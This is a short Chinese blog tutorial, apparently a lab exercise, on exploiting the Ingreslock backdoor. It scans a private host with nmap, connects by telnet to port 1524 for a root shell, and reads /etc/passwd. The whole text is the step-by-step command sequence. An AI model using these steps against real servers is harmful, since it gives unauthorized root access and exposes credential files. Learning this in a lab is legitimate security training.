標籤:ingreslock後門
利用telnet命令串連目標主機的1524連接埠,直接擷取root許可權。
Ingreslock後門程式監聽在1524連接埠,串連到1524連接埠就可以直接獲得root許可權, 經常被用於入侵一個暴露的伺服器。
一、利用nmap工具掃描目標主機
1.1使用nmap命令對目標主機進行掃描。單擊案頭空白處,右鍵菜單選擇“在終端中開啟”。
1.2在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行連接埠掃描,發現開放1524連接埠。
650) this.width=650;" src="http://s1.51cto.com/wyfs02/M02/8D/12/wKiom1iEgefB4PPLAAGye1gg1eQ812.jpg" style="float:none;" title="1.jpg" alt="wKiom1iEgefB4PPLAAGye1gg1eQ812.jpg" />
1.3在終端中輸入命令“telnet 192.168.1.3 1524”,串連目標主機1524連接埠,先是串連成功。3所示
1.4在終端中輸入命令“whoami”,尋找擷取的許可權。4所示
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M02/8D/0F/wKioL1iEgeeiDdy7AAAwx_jxCKc296.jpg" style="float:none;" title="2.jpg" alt="wKioL1iEgeeiDdy7AAAwx_jxCKc296.jpg" />
1.5在終端中輸入命令“ifconfig eth0”,查看網卡資訊,在終端下輸入“cat /etc/passwd”,查看遠程主機的密碼檔案。
650) this.width=650;" src="http://s4.51cto.com/wyfs02/M00/8D/12/wKiom1iEgeeQlJDuAACSCPnrWso647.jpg" style="float:none;" title="3.jpg" alt="wKiom1iEgeeQlJDuAACSCPnrWso647.jpg" />
650) this.width=650;" src="http://s5.51cto.com/wyfs02/M02/8D/0F/wKioL1iEgenxikz2AAICxY1LjZ8113.jpg" style="float:none;" title="4.jpg" alt="wKioL1iEgenxikz2AAICxY1LjZ8113.jpg" />
本文出自 “12377962” 部落格,請務必保留此出處http://12387962.blog.51cto.com/12377962/1893770
Ingreslock後門漏洞